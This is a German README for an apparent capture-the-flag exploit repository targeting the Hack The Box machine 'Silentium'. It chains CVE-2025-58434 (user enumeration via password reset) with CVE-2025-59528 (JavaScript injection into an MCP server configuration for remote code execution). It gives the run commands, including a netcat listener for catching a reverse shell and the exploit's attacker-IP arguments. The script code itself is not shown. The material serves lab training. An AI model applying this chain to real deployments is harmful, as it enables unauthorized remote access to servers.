
Exploitation Silentium HTB-CTF
Dieses Repository enthält die vollständige Exploit-Kette für die Silentium-Maschine auf Hack The Box. Der Exploit nutzt eine zweistufige Schwachstelle aus, die User-Enumeration und JavaScript-Injektion umfasst, um Remote Code Execution (RCE) zu erreichen.
Die Schwachstellenkette besteht aus einem Informationspreisgabefehler und einer kritischen Code-Injektion. Indem wir zunächst gültige Benutzer über einen Fehler beim Zurücksetzen des Passworts enumerieren, erhalten wir den notwendigen Kontext, um den customMCP-Endpunkt anzugreifen. Die RCE wird erreicht, indem eine bösartige JavaScript-Funktion in den Parameter mcpServerConfig injiziert wird, die vom Node.js-Backend ausgeführt wird.
Sie müssen Python 3 und Bash installiert haben sowie die folgende Bibliothek:
pip install requests
Führen Sie das Enumerations-Skript (Bash) aus, um gültige Konten zu finden (erfordert users.txt):
python3 CVE-2025-58434.py
Starten Sie auf Ihrem lokalen Rechner einen Netcat-Listener:
nc -lvnp 4444
Führen Sie das Python-Skript aus und geben Sie das Ziel, Ihre IP und den erhaltenen API-Schlüssel an:
python3 CVE-2025-59528.py -t -k <API_KEY> -l <YOUR_IP> -p 4444
| Argument | Beschreibung | Erforderlich |
|---|---|---|
| -t, --target | Ziel-Host | Ja |
| -k, --key | API Bearer Token | Ja |
| -l, --lhost | Ihre Listener-IP (VPN) | Ja |
| -p, --lport | Ihr Listener-Port | Ja |
Dieses Skript ist ausschließlich für Bildungszwecke und autorisierte Penetrationstests in CTF-Umgebungen vorgesehen. Der Zugriff auf oder Angriff auf Ziele ohne vorherige Genehmigung ist illegal.
Challenge: Silentium (Hack The Box)
CVEs: CVE-2025-58434 | CVE-2025-59528